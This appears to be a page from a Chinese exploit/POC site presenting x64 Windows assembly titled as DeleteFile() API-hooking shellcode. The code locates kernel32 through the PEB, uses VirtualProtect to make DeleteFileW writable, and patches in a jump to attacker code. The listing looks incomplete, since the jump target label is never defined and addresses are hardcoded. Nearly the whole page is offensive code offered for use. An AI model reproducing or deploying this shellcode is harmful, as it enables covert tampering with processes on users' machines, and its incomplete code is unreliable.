当前位置:首页 > POC 2017年12月11日
Windows/x64 - DeleteFile() API Hooking Shellcode

xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]
  
mov rdi,[rsi+32] ;rdi=kernel32.dll base Address
  
;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()
  
;----------------------------------
;This Part is Important
  
xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()
  
;---------------------------------------------------
;Changing memory attribute
mov rcx,r12
push rdx
  
mov dl,9
  
pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi
  
;--------------------------------------------------------
mov [r12],byte 0xe9
jmp shellcode
  
inj:
pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx
  
xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14
  
call rsi
add rsp,4
ret
  
  





发表评论: